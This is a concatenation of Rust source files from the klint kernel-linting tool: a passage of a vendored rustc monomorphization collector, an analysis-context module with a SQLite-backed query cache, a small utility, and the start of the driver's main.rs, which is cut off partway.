// to report in such cases)
//
// This leads to suboptimal error reporting: a post-monomorphization error (PME) will be
// shown with just a spanned piece of code causing the error, without information on where
// it was called from. This is especially obscure if the erroneous mono item is in a
// dependency. See for example issue #85155, where, before minimization, a PME happened two
// crates downstream from libcore's stdarch, without a way to know which dependency was the
// cause.
//
// If such an error occurs in the current crate, its span will be enough to locate the
// source. If the cause is in another crate, the goal here is to quickly locate which mono
// item in the current crate is ultimately responsible for causing the error.
//
// To give at least _some_ context to the user: while collecting mono items, we check the
// error count. If it has changed, a PME occurred, and we trigger some diagnostics about the
// current step of mono items collection.
//
// FIXME: don't rely on global state, instead bubble up errors. Note: this is very hard to do.
let error_count = tcx.dcx().err_count();
// In `mentioned_items` we collect items that were mentioned in this MIR but possibly do not
// need to be monomorphized. This is done to ensure that optimizing away function calls does not
// hide const-eval errors that those calls would otherwise have triggered.
match starting_item.node {
MonoItem::Static(def_id) => {
recursion_depth_reset = None;
// Statics always get evaluated (which is possible because they can't be generic), so for
// `MentionedItems` collection there's nothing to do here.
if mode == CollectionMode::UsedItems {
let instance = Instance::mono(tcx, def_id);
// Sanity check whether this ended up being collected accidentally
debug_assert!(tcx.should_codegen_locally(instance));
let DefKind::Static { nested, .. } = tcx.def_kind(def_id) else {
bug!()
};
// Nested statics have no type.
if !nested {
let ty = instance.ty(tcx, ty::TypingEnv::fully_monomorphized());
visit_drop_use(tcx, ty, true, starting_item.span, &mut used_items);
}
if let Ok(alloc) = tcx.eval_static_initializer(def_id) {
for &prov in alloc.inner().provenance().ptrs().values() {
collect_alloc(tcx, prov.alloc_id(), &mut used_items);
}
}
if tcx.needs_thread_local_shim(def_id) {
used_items.push(respan(
starting_item.span,
MonoItem::Fn(Instance {
def: InstanceKind::ThreadLocalShim(def_id),
args: GenericArgs::empty(),
}),
));
}
}
// mentioned_items stays empty since there's no codegen for statics. statics don't get
// optimized, and if they did then the const-eval interpreter would have to worry about
// mentioned_items.
}
MonoItem::Fn(instance) => {
// Sanity check whether this ended up being collected accidentally
debug_assert!(tcx.should_codegen_locally(instance));
// Keep track of the monomorphization recursion depth
recursion_depth_reset = Some(check_recursion_limit(
tcx,
instance,
starting_item.span,
recursion_depths,
recursion_limit,
));
rustc_data_structures::stack::ensure_sufficient_stack(|| {
let (used, mentioned) = items_of_instance(tcx, (instance, mode));
used_items.extend(used.into_iter().copied());
mentioned_items.extend(mentioned.into_iter().copied());
});
}
MonoItem::GlobalAsm(item_id) => {
assert!(
mode == CollectionMode::UsedItems,
"should never encounter global_asm when collecting mentioned items"
);
recursion_depth_reset = None;
let item = tcx.hir_item(item_id);
if let hir::ItemKind::GlobalAsm { asm, .. } = item.kind {
for (op, op_sp) in asm.operands {
match *op {
hir::InlineAsmOperand::Const { .. } => {
// Only constants which resolve to a plain integer
// are supported. Therefore the value should not
// depend on any other items.
}
hir::InlineAsmOperand::SymFn { expr } => {
let fn_ty = tcx.typeck(item_id.owner_id).expr_ty(expr);
visit_fn_use(tcx, fn_ty, false, *op_sp, &mut used_items);
}
hir::InlineAsmOperand::SymStatic { path: _, def_id } => {
// DIFF: remove should_codegen_locally
trace!("collecting static {:?}", def_id);
used_items.push(dummy_spanned(MonoItem::Static(def_id)));
}
hir::InlineAsmOperand::In { .. }
| hir::InlineAsmOperand::Out { .. }
| hir::InlineAsmOperand::InOut { .. }
| hir::InlineAsmOperand::SplitInOut { .. }
| hir::InlineAsmOperand::Label { .. } => {
span_bug!(*op_sp, "invalid operand type for global_asm!")
}
}
}
} else {
span_bug!(
item.span,
"Mismatch between hir::Item type and MonoItem type"
)
}
// mention_items stays empty as nothing gets optimized here.
}
}
// Check for PMEs and emit a diagnostic if one happened. To try to show relevant edges of the
// mono item graph.
if tcx.dcx().err_count() > error_count
&& starting_item.node.is_generic_fn()
&& starting_item.node.is_user_defined()
{
match starting_item.node {
MonoItem::Fn(instance) => tcx.dcx().emit_note(EncounteredErrorWhileInstantiating {
span: starting_item.span,
kind: "fn",
instance,
}),
MonoItem::Static(def_id) => tcx.dcx().emit_note(EncounteredErrorWhileInstantiating {
span: starting_item.span,
kind: "static",
instance: Instance::new_raw(def_id, GenericArgs::empty()),
}),
MonoItem::GlobalAsm(_) => {
tcx.dcx()
.emit_note(EncounteredErrorWhileInstantiatingGlobalAsm {
span: starting_item.span,
})
}
}
}
// Only updating `usage_map` for used items as otherwise we may be inserting the same item
// multiple times (if it is first 'mentioned' and then later actually used), and the usage map
// logic does not like that.
// This is part of the output of collection and hence only relevant for "used" items.
// ("Mentioned" items are only considered internally during collection.)
if mode == CollectionMode::UsedItems {
state
.usage_map
.lock_mut()
.record_used(starting_item.node, &used_items);
}
{
let mut visited = OnceCell::default();
if mode == CollectionMode::UsedItems {
used_items.items.retain(|k, _| {
visited
.get_mut_or_init(|| state.visited.lock_mut())
.insert(*k)
});
}
let mut mentioned = OnceCell::default();
mentioned_items.items.retain(|k, _| {
!visited.get_or_init(|| state.visited.lock()).contains(k)
&& mentioned
.get_mut_or_init(|| state.mentioned.lock_mut())
.insert(*k)
});
}
if mode == CollectionMode::MentionedItems {
assert!(
used_items.is_empty(),
"'mentioned' collection should never encounter used items"
);
} else {
for used_item in used_items {
let should_gen = match used_item.node {
MonoItem::Static(def_id) => {
let instance = Instance::mono(tcx, def_id);
tcx.should_codegen_locally(instance)
}
MonoItem::Fn(instance) => tcx.should_codegen_locally(instance),
MonoItem::GlobalAsm(_) => true,
};
if should_gen {
collect_items_rec(
tcx,
used_item,
state,
recursion_depths,
recursion_limit,
CollectionMode::UsedItems,
);
}
}
}
// Walk over mentioned items *after* used items, so that if an item is both mentioned and used then
// the loop above has fully collected it, so this loop will skip it.
for mentioned_item in mentioned_items {
let should_gen = match mentioned_item.node {
MonoItem::Static(def_id) => {
let instance = Instance::mono(tcx, def_id);
tcx.should_codegen_locally(instance)
}
MonoItem::Fn(instance) => tcx.should_codegen_locally(instance),
MonoItem::GlobalAsm(_) => true,
};
if should_gen {
collect_items_rec(
tcx,
mentioned_item,
state,
recursion_depths,
recursion_limit,
CollectionMode::MentionedItems,
);
}
}
if let Some((def_id, depth)) = recursion_depth_reset {
recursion_depths.insert(def_id, depth);
}
}
fn check_recursion_limit<'tcx>(
tcx: TyCtxt<'tcx>,
instance: Instance<'tcx>,
span: Span,
recursion_depths: &mut DefIdMap<usize>,
recursion_limit: Limit,
) -> (DefId, usize) {
let def_id = instance.def_id();
let recursion_depth = recursion_depths.get(&def_id).cloned().unwrap_or(0);
debug!(" => recursion depth={}", recursion_depth);
let adjusted_recursion_depth = if Some(def_id) == tcx.lang_items().drop_in_place_fn() {
// HACK: drop_in_place creates tight monomorphization loops. Give
// it more margin.
recursion_depth / 4
} else {
recursion_depth
};
// Code that needs to instantiate the same function recursively
// more than the recursion limit is assumed to be causing an
// infinite expansion.
if !recursion_limit.value_within_limit(adjusted_recursion_depth) {
let def_span = tcx.def_span(def_id);
let def_path_str = tcx.def_path_str(def_id);
tcx.dcx().emit_fatal(RecursionLimit {
span,
instance,
def_span,
def_path_str,
});
}
recursion_depths.insert(def_id, recursion_depth + 1);
(def_id, recursion_depth)
}
struct MirUsedCollector<'a, 'tcx> {
tcx: TyCtxt<'tcx>,
body: &'a mir::Body<'tcx>,
used_items: &'a mut MonoItems<'tcx>,
/// See the comment in `collect_items_of_instance` for the purpose of this set.
/// Note that this contains *not-monomorphized* items!
used_mentioned_items: &'a mut UnordSet<MentionedItem<'tcx>>,
instance: Instance<'tcx>,
}
impl<'a, 'tcx> MirUsedCollector<'a, 'tcx> {
pub fn monomorphize<T>(&self, value: T) -> T
where
T: TypeFoldable<TyCtxt<'tcx>>,
{
debug!("monomorphize: self.instance={:?}", self.instance);
self.instance.instantiate_mir_and_normalize_erasing_regions(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
ty::EarlyBinder::bind(value),
)
}
/// Evaluates a *not yet monomorphized* constant.
fn eval_constant(&mut self, constant: &mir::ConstOperand<'tcx>) -> Option<mir::ConstValue> {
let const_ = self.monomorphize(constant.const_);
// Evaluate the constant. This makes const eval failure a collection-time error (rather than
// a codegen-time error). rustc stops after collection if there was an error, so this
// ensures codegen never has to worry about failing consts.
// (codegen relies on this and ICEs will happen if this is violated.)
match const_.eval(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
constant.span,
) {
Ok(v) => Some(v),
Err(ErrorHandled::TooGeneric(..)) => span_bug!(
constant.span,
"collection encountered polymorphic constant: {:?}",
const_
),
Err(err @ ErrorHandled::Reported(..)) => {
err.emit_note(self.tcx);
return None;
}
}
}
}
impl<'a, 'tcx> MirVisitor<'tcx> for MirUsedCollector<'a, 'tcx> {
fn visit_rvalue(&mut self, rvalue: &mir::Rvalue<'tcx>, location: Location) {
debug!("visiting rvalue {:?}", *rvalue);
let span = self.body.source_info(location).span;
match *rvalue {
// When doing an cast from a regular pointer to a fat pointer, we
// have to instantiate all methods of the trait being cast to, so we
// can build the appropriate vtable.
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::Unsize, _),
ref operand,
target_ty,
) => {
let source_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::UnsizeCast {
source_ty,
target_ty,
});
let target_ty = self.monomorphize(target_ty);
let source_ty = self.monomorphize(source_ty);
let (source_ty, target_ty) = find_tails_for_unsizing(
self.tcx.at(span),
ty::TypingEnv::fully_monomorphized(),
source_ty,
target_ty,
);
// This could also be a different Unsize instruction, like
// from a fixed sized array to a slice. But we are only
// interested in things that produce a vtable.
if target_ty.is_trait() && !source_ty.is_trait() {
create_mono_items_for_vtable_methods(
self.tcx,
target_ty,
source_ty,
span,
self.used_items,
);
}
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ReifyFnPointer(_), _),
ref operand,
_,
) => {
let fn_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Fn(fn_ty));
let fn_ty = self.monomorphize(fn_ty);
visit_fn_use(self.tcx, fn_ty, false, span, self.used_items);
}
mir::Rvalue::Cast(
mir::CastKind::PointerCoercion(PointerCoercion::ClosureFnPointer(_), _),
ref operand,
_,
) => {
let source_ty = operand.ty(self.body, self.tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items
.insert(MentionedItem::Closure(source_ty));
let source_ty = self.monomorphize(source_ty);
if let ty::Closure(def_id, args) = *source_ty.kind() {
let instance =
Instance::resolve_closure(self.tcx, def_id, args, ty::ClosureKind::FnOnce);
// DIFF: remove should_codegen_locally
self.used_items
.push(create_fn_mono_item(self.tcx, instance, span));
} else {
bug!()
}
}
mir::Rvalue::ThreadLocalRef(def_id) => {
assert!(self.tcx.is_thread_local_static(def_id));
// DIFF: remove should_codegen_locally
trace!("collecting thread-local static {:?}", def_id);
self.used_items.push(respan(span, MonoItem::Static(def_id)));
}
_ => { /* not interesting */ }
}
self.super_rvalue(rvalue, location);
}
/// This does not walk the MIR of the constant as that is not needed for codegen, all we need is
/// to ensure that the constant evaluates successfully and walk the result.
fn visit_const_operand(&mut self, constant: &mir::ConstOperand<'tcx>, _location: Location) {
// No `super_constant` as we don't care about `visit_ty`/`visit_ty_const`.
let Some(val) = self.eval_constant(constant) else {
return;
};
collect_const_value(self.tcx, val, self.used_items);
}
fn visit_terminator(&mut self, terminator: &mir::Terminator<'tcx>, location: Location) {
debug!("visiting terminator {:?} @ {:?}", terminator, location);
let source = self.body.source_info(location).span;
let tcx = self.tcx;
let push_mono_lang_item = |this: &mut Self, lang_item: LangItem| {
let instance = Instance::mono(tcx, tcx.require_lang_item(lang_item, source));
// DIFF: remove should_codegen_locally
this.used_items
.push(create_fn_mono_item(tcx, instance, source));
};
match terminator.kind {
mir::TerminatorKind::Call { ref func, .. }
| mir::TerminatorKind::TailCall { ref func, .. } => {
let callee_ty = func.ty(self.body, tcx);
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items
.insert(MentionedItem::Fn(callee_ty));
let callee_ty = self.monomorphize(callee_ty);
// HACK(explicit_tail_calls): collect tail calls to `#[track_caller]` functions as indirect,
// because we later call them as such, to prevent issues with ABI incompatibility.
// Ideally we'd replace such tail calls with normal call + return, but this requires
// post-mono MIR optimizations, which we don't yet have.
let force_indirect_call =
if matches!(terminator.kind, mir::TerminatorKind::TailCall { .. })
&& let &ty::FnDef(def_id, args) = callee_ty.kind()
&& let instance = ty::Instance::expect_resolve(
self.tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
source,
)
&& instance.def.requires_caller_location(self.tcx)
{
true
} else {
false
};
visit_fn_use(
self.tcx,
callee_ty,
!force_indirect_call,
source,
&mut self.used_items,
)
}
mir::TerminatorKind::Drop { ref place, .. } => {
let ty = place.ty(self.body, self.tcx).ty;
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Drop(ty));
let ty = self.monomorphize(ty);
visit_drop_use(self.tcx, ty, true, source, self.used_items);
}
mir::TerminatorKind::InlineAsm { ref operands, .. } => {
for op in operands {
match *op {
mir::InlineAsmOperand::SymFn { ref value } => {
let fn_ty = value.const_.ty();
// *Before* monomorphizing, record that we already handled this mention.
self.used_mentioned_items.insert(MentionedItem::Fn(fn_ty));
let fn_ty = self.monomorphize(fn_ty);
visit_fn_use(self.tcx, fn_ty, false, source, self.used_items);
}
mir::InlineAsmOperand::SymStatic { def_id } => {
// DIFF: remove should_codegen_locally
trace!("collecting asm sym static {:?}", def_id);
self.used_items
.push(respan(source, MonoItem::Static(def_id)));
}
_ => {}
}
}
}
mir::TerminatorKind::Assert { ref msg, .. } => match &**msg {
mir::AssertKind::BoundsCheck { .. } => {
push_mono_lang_item(self, LangItem::PanicBoundsCheck);
}
mir::AssertKind::MisalignedPointerDereference { .. } => {
push_mono_lang_item(self, LangItem::PanicMisalignedPointerDereference);
}
mir::AssertKind::NullPointerDereference => {
push_mono_lang_item(self, LangItem::PanicNullPointerDereference);
}
mir::AssertKind::InvalidEnumConstruction(_) => {
push_mono_lang_item(self, LangItem::PanicInvalidEnumConstruction);
}
_ => {
push_mono_lang_item(self, msg.panic_function());
}
},
mir::TerminatorKind::UnwindTerminate(reason) => {
push_mono_lang_item(self, reason.lang_item());
}
mir::TerminatorKind::Goto { .. }
| mir::TerminatorKind::SwitchInt { .. }
| mir::TerminatorKind::UnwindResume
| mir::TerminatorKind::Return
| mir::TerminatorKind::Unreachable => {}
mir::TerminatorKind::CoroutineDrop
| mir::TerminatorKind::Yield { .. }
| mir::TerminatorKind::FalseEdge { .. }
| mir::TerminatorKind::FalseUnwind { .. } => bug!(),
}
if let Some(mir::UnwindAction::Terminate(reason)) = terminator.unwind() {
push_mono_lang_item(self, reason.lang_item());
}
self.super_terminator(terminator, location);
}
}
fn visit_drop_use<'tcx>(
tcx: TyCtxt<'tcx>,
ty: Ty<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
let instance = Instance::resolve_drop_in_place(tcx, ty);
visit_instance_use(tcx, instance, is_direct_call, source, output);
}
fn visit_fn_use<'tcx>(
tcx: TyCtxt<'tcx>,
ty: Ty<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
if let ty::FnDef(def_id, args) = *ty.kind() {
let instance = if is_direct_call {
ty::Instance::expect_resolve(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
source,
)
} else {
match ty::Instance::resolve_for_fn_ptr(
tcx,
ty::TypingEnv::fully_monomorphized(),
def_id,
args,
) {
Some(instance) => instance,
_ => bug!("failed to resolve instance for {ty}"),
}
};
visit_instance_use(tcx, instance, is_direct_call, source, output);
}
}
fn visit_instance_use<'tcx>(
tcx: TyCtxt<'tcx>,
instance: ty::Instance<'tcx>,
is_direct_call: bool,
source: Span,
output: &mut MonoItems<'tcx>,
) {
debug!(
"visit_item_use({:?}, is_direct_call={:?})",
instance, is_direct_call
);
// DIFF: remove should_codegen_locally
if let Some(intrinsic) = tcx.intrinsic(instance.def_id()) {
// TODO: should I also vendor in autodiff code?
// collect_autodiff_fn(tcx, instance, intrinsic, output);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | true |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/ctxt.rs | src/ctxt.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::any::Any;
use std::marker::PhantomData;
use std::sync::Arc;
use rusqlite::{Connection, OptionalExtension};
use rustc_data_structures::fx::FxHashMap;
use rustc_data_structures::sync::{DynSend, DynSync, MTLock, RwLock};
use rustc_hir::def_id::{CrateNum, LOCAL_CRATE};
use rustc_middle::ty::TyCtxt;
use rustc_serialize::{Decodable, Encodable};
use rustc_session::config::OutputType;
use rustc_span::{DUMMY_SP, Span};
use crate::diagnostic::use_stack::UseSite;
use crate::utils::anymap::AnyMap;
pub(crate) trait Query: 'static {
const NAME: &'static str;
type Key<'tcx>: DynSend + DynSync;
type Value<'tcx>: DynSend + DynSync;
}
pub(crate) trait QueryValueDecodable: Query {
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>);
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx>;
}
impl<Q: Query> QueryValueDecodable for Q
where
for<'a, 'tcx> Q::Value<'tcx>: Encodable<crate::serde::EncodeContext<'tcx>>
+ Decodable<crate::serde::DecodeContext<'a, 'tcx>>,
{
fn encode_value<'tcx>(value: &Self::Value<'tcx>, cx: &mut crate::serde::EncodeContext<'tcx>) {
Encodable::encode(value, cx)
}
fn decode_value<'a, 'tcx>(cx: &mut crate::serde::DecodeContext<'a, 'tcx>) -> Self::Value<'tcx> {
Decodable::decode(cx)
}
}
pub(crate) trait PersistentQuery: QueryValueDecodable {
type LocalKey<'tcx>: Encodable<crate::serde::EncodeContext<'tcx>>;
fn into_crate_and_local<'tcx>(key: Self::Key<'tcx>) -> (CrateNum, Self::LocalKey<'tcx>);
}
pub struct AnalysisCtxt<'tcx> {
pub tcx: TyCtxt<'tcx>,
pub local_conn: MTLock<Connection>,
pub sql_conn: RwLock<FxHashMap<CrateNum, Option<Arc<MTLock<Connection>>>>>,
pub call_stack: RwLock<Vec<UseSite<'tcx>>>,
pub query_cache: RwLock<AnyMap<dyn Any + DynSend + DynSync>>,
}
// Everything in `AnalysisCtxt` is either `DynSend/DynSync` or `Send/Sync`, but since there're no relation between two right now compiler cannot infer this.
unsafe impl<'tcx> DynSend for AnalysisCtxt<'tcx> {}
unsafe impl<'tcx> DynSync for AnalysisCtxt<'tcx> {}
impl<'tcx> std::ops::Deref for AnalysisCtxt<'tcx> {
type Target = TyCtxt<'tcx>;
fn deref(&self) -> &Self::Target {
&self.tcx
}
}
macro_rules! memoize {
($(#[$attr:meta])* $vis:vis fn $name:ident<$tcx: lifetime>($cx:ident: $($_: ty)? $(, $key:ident: $key_ty:ty)* $(,)?) -> $ret: ty { $($body: tt)* }) => {
#[allow(non_camel_case_types)]
$vis struct $name;
impl crate::ctxt::Query for $name {
const NAME: &'static str = core::stringify!($name);
#[allow(unused_parens)]
type Key<$tcx> = ($($key_ty),*);
type Value<$tcx> = $ret;
}
impl<'tcx> crate::ctxt::AnalysisCtxt<'tcx> {
$vis fn $name(&self, $($key: $key_ty,)*) -> $ret {
$(#[$attr])*
fn $name<$tcx>($cx: &crate::ctxt::AnalysisCtxt<$tcx>, $($key: $key_ty),*) -> $ret {
$($body)*
}
let pack = ($($key),*);
let cache = self.query_cache::<$name>();
{
let guard = cache.borrow();
if let Some(val) = guard.get(&pack) {
return <$ret>::clone(val);
}
}
let val = $name(self, $($key),*);
let mut guard = cache.borrow_mut();
guard.insert(pack, <$ret>::clone(&val));
val
}
}
}
}
const SCHEMA_VERSION: u32 = 1;
impl Drop for AnalysisCtxt<'_> {
fn drop(&mut self) {
self.local_conn.lock().execute("commit", ()).unwrap();
}
}
impl<'tcx> AnalysisCtxt<'tcx> {
pub(crate) fn query_cache<Q: Query>(
&self,
) -> Arc<RwLock<FxHashMap<Q::Key<'tcx>, Q::Value<'tcx>>>> {
let mut guard = self.query_cache.borrow_mut();
let cache = guard
.entry()
.or_insert_with(|| {
let cache = Arc::new(RwLock::new(
FxHashMap::<Q::Key<'static>, Q::Value<'static>>::default(),
));
(PhantomData::<fn() -> Q>, cache)
})
.1
.clone();
// Everything stored inside query_cache is conceptually `'tcx`, but due to limitation
// of `Any` we hack around the lifetime.
unsafe { std::mem::transmute(cache) }
}
pub(crate) fn sql_connection(&self, cnum: CrateNum) -> Option<Arc<MTLock<Connection>>> {
if let Some(v) = self.sql_conn.borrow().get(&cnum) {
return v.clone();
}
let mut guard = self.sql_conn.borrow_mut();
if let Some(v) = guard.get(&cnum) {
return v.clone();
}
let mut result = None;
let mut sysroot = false;
for path in self.tcx.crate_extern_paths(cnum) {
if path.starts_with(&self.sess.opts.sysroot.default) {
sysroot = true;
continue;
}
let klint_path = path.with_extension("klint");
if !klint_path.exists() {
continue;
}
let conn = Connection::open_with_flags(
&klint_path,
rusqlite::OpenFlags::SQLITE_OPEN_READ_ONLY,
)
.unwrap();
// Check the schema version matches the current version
let mut schema_ver = 0;
conn.pragma_query(None, "user_version", |r| {
schema_ver = r.get::<_, u32>(0)?;
Ok(())
})
.unwrap();
if schema_ver != SCHEMA_VERSION {
info!(
"schema version of {} mismatch, ignoring",
klint_path.display()
);
}
result = Some(Arc::new(MTLock::new(conn)));
break;
}
// If we're running with pre-built sysroot, none of the these will be available to klint.
// In such cases, stop emitting too much warnings.
if result.is_none() && !sysroot {
let name = self.tcx.crate_name(cnum);
warn!("no klint metadata found for crate {}", name);
}
guard.insert(cnum, result.clone());
result
}
pub(crate) fn sql_create_table<Q: Query>(&self) {
self.local_conn
.lock()
.execute_batch(&format!(
"CREATE TABLE {} (key BLOB PRIMARY KEY, value BLOB);",
Q::NAME
))
.unwrap();
}
pub(crate) fn sql_load_with_span<Q: PersistentQuery>(
&self,
key: Q::Key<'tcx>,
span: Span,
) -> Option<Q::Value<'tcx>> {
let (cnum, local_key) = Q::into_crate_and_local(key);
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
local_key.encode(&mut encode_ctx);
let encoded = encode_ctx.finish();
let value_encoded: Vec<u8> = self
.sql_connection(cnum)?
.lock()
.query_row(
&format!("SELECT value FROM {} WHERE key = ?", Q::NAME),
rusqlite::params![encoded],
|row| row.get(0),
)
.optional()
.unwrap()?;
let mut decode_ctx = crate::serde::DecodeContext::new(self.tcx, &value_encoded, span);
let value = Q::decode_value(&mut decode_ctx);
Some(value)
}
pub(crate) fn sql_load<Q: PersistentQuery>(&self, key: Q::Key<'tcx>) -> Option<Q::Value<'tcx>> {
self.sql_load_with_span::<Q>(key, DUMMY_SP)
}
pub(crate) fn sql_store_with_span<Q: PersistentQuery>(
&self,
key: Q::Key<'tcx>,
value: Q::Value<'tcx>,
span: Span,
) {
let (cnum, local_key) = Q::into_crate_and_local(key);
assert!(cnum == LOCAL_CRATE);
// Avoid serialising anything if there are errors (to prevent errors from being encoded
// which can cause panic).
if self.dcx().has_errors().is_some() {
return;
}
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
local_key.encode(&mut encode_ctx);
let key_encoded = encode_ctx.finish();
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
Q::encode_value(&value, &mut encode_ctx);
let value_encoded = encode_ctx.finish();
self.local_conn
.lock()
.execute(
&format!(
"INSERT OR REPLACE INTO {} (key, value) VALUES (?, ?)",
Q::NAME
),
rusqlite::params![key_encoded, value_encoded],
)
.unwrap();
}
pub(crate) fn sql_store<Q: PersistentQuery>(&self, key: Q::Key<'tcx>, value: Q::Value<'tcx>) {
self.sql_store_with_span::<Q>(key, value, DUMMY_SP);
}
pub fn new(tcx: TyCtxt<'tcx>) -> Self {
let output_filenames = tcx.output_filenames(());
// FIXME: This makes sure that we can find the correct name for .so files
// used for proc macros. But this is quite hacky.
let preferred_output = if output_filenames
.outputs
.contains_explicit_name(&OutputType::Exe)
{
OutputType::Exe
} else {
OutputType::Metadata
};
let output_path = output_filenames.path(preferred_output);
let output_path = output_path.as_path();
let klint_out = output_path.with_extension("klint");
let _ = std::fs::remove_file(&klint_out);
let conn = Connection::open(&klint_out).unwrap();
// Check the schema version matches the current version
let mut schema_ver = 0;
conn.pragma_query(None, "user_version", |r| {
schema_ver = r.get::<_, u32>(0)?;
Ok(())
})
.unwrap();
conn.execute("begin immediate", ()).unwrap();
conn.pragma_update(None, "user_version", SCHEMA_VERSION)
.unwrap();
let ret = Self {
tcx,
local_conn: MTLock::new(conn),
sql_conn: Default::default(),
call_stack: Default::default(),
query_cache: Default::default(),
};
ret.sql_create_table::<crate::preempt_count::annotation::preemption_count_annotation>();
ret.sql_create_table::<crate::preempt_count::annotation::drop_preemption_count_annotation>(
);
ret.sql_create_table::<crate::preempt_count::adjustment::instance_adjustment>();
ret.sql_create_table::<crate::preempt_count::expectation::instance_expectation>();
ret.sql_create_table::<crate::mir::analysis_mir>();
ret.sql_create_table::<crate::diagnostic_items::klint_diagnostic_items>();
ret
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/util.rs | src/util.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def_id::DefId;
use rustc_lint::LateContext;
use rustc_middle::ty::TypeVisitableExt;
pub fn fn_has_unsatisfiable_preds(cx: &LateContext<'_>, did: DefId) -> bool {
use rustc_trait_selection::traits;
let predicates = cx
.tcx
.predicates_of(did)
.predicates
.iter()
.filter_map(|(p, _)| if p.is_global() { Some(*p) } else { None });
traits::impossible_predicates(
cx.tcx,
traits::elaborate(cx.tcx, predicates).collect::<Vec<_>>(),
)
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/main.rs | src/main.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![feature(rustc_private)]
#![feature(box_patterns)]
#![feature(if_let_guard)]
#![feature(never_type)]
#![feature(try_blocks)]
// Used in monomorphize collector
#![feature(impl_trait_in_assoc_type)]
#![feature(once_cell_get_mut)]
// Used in symbol.rs
#![feature(macro_metavar_expr)]
#![feature(unsize)]
#![warn(rustc::internal)]
#[macro_use]
extern crate rustc_macros;
#[macro_use]
extern crate rustc_middle;
#[macro_use]
extern crate tracing;
extern crate itertools;
extern crate rustc_abi;
extern crate rustc_ast;
extern crate rustc_codegen_ssa;
extern crate rustc_data_structures;
extern crate rustc_driver;
extern crate rustc_errors;
extern crate rustc_fluent_macro;
extern crate rustc_hir;
extern crate rustc_index;
extern crate rustc_infer;
extern crate rustc_interface;
extern crate rustc_lint;
extern crate rustc_log;
extern crate rustc_metadata;
extern crate rustc_mir_dataflow;
extern crate rustc_monomorphize;
extern crate rustc_serialize;
extern crate rustc_session;
extern crate rustc_span;
extern crate rustc_target;
extern crate rustc_trait_selection;
extern crate thiserror;
use rustc_driver::Callbacks;
use rustc_interface::interface::Config;
use rustc_middle::ty::TyCtxt;
use rustc_session::EarlyDiagCtxt;
use rustc_session::config::{ErrorOutputType, OutputType};
use std::sync::atomic::Ordering;
use crate::ctxt::AnalysisCtxt;
#[macro_use]
mod ctxt;
mod atomic_context;
mod attribute;
mod binary_analysis;
mod diagnostic;
mod diagnostic_items;
mod driver;
mod infallible_allocation;
mod lattice;
mod mir;
mod monomorphize_collector;
mod preempt_count;
mod serde;
mod symbol;
mod util;
mod utils;
rustc_session::declare_tool_lint! {
pub klint::INCORRECT_ATTRIBUTE,
Forbid,
"Incorrect usage of klint attributes"
}
struct MyCallbacks;
impl Callbacks for MyCallbacks {
fn config(&mut self, config: &mut Config) {
config.locale_resources.push(crate::DEFAULT_LOCALE_RESOURCE);
config.extra_symbols = crate::symbol::EXTRA_SYMBOLS.to_owned();
config.override_queries = Some(|_, provider| {
// Calling `optimized_mir` will steal the result of query `mir_drops_elaborated_and_const_checked`,
// so hijack `optimized_mir` to run `analysis_mir` first.
hook_query!(provider.optimized_mir => |tcx, local_def_id, original| {
let def_id = local_def_id.to_def_id();
// Skip `analysis_mir` call if this is a constructor, since it will be delegated back to
// `optimized_mir` for building ADT constructor shim.
if !tcx.is_constructor(def_id) {
let cx = crate::driver::cx::<MyCallbacks>(tcx);
let _ = cx.analysis_mir(def_id);
}
original(tcx, local_def_id)
});
});
config.register_lints = Some(Box::new(move |_, lint_store| {
lint_store.register_lints(&[
INCORRECT_ATTRIBUTE,
infallible_allocation::INFALLIBLE_ALLOCATION,
atomic_context::ATOMIC_CONTEXT,
binary_analysis::stack_size::STACK_FRAME_TOO_LARGE,
]);
// lint_store
// .register_late_pass(|_| Box::new(infallible_allocation::InfallibleAllocation));
#[cfg(feature = "preempt_count")]
lint_store.register_late_pass(|tcx| {
Box::new(atomic_context::AtomicContext {
cx: driver::cx::<MyCallbacks>(tcx),
})
});
}));
}
fn after_analysis<'tcx>(
&mut self,
_compiler: &rustc_interface::interface::Compiler,
tcx: TyCtxt<'tcx>,
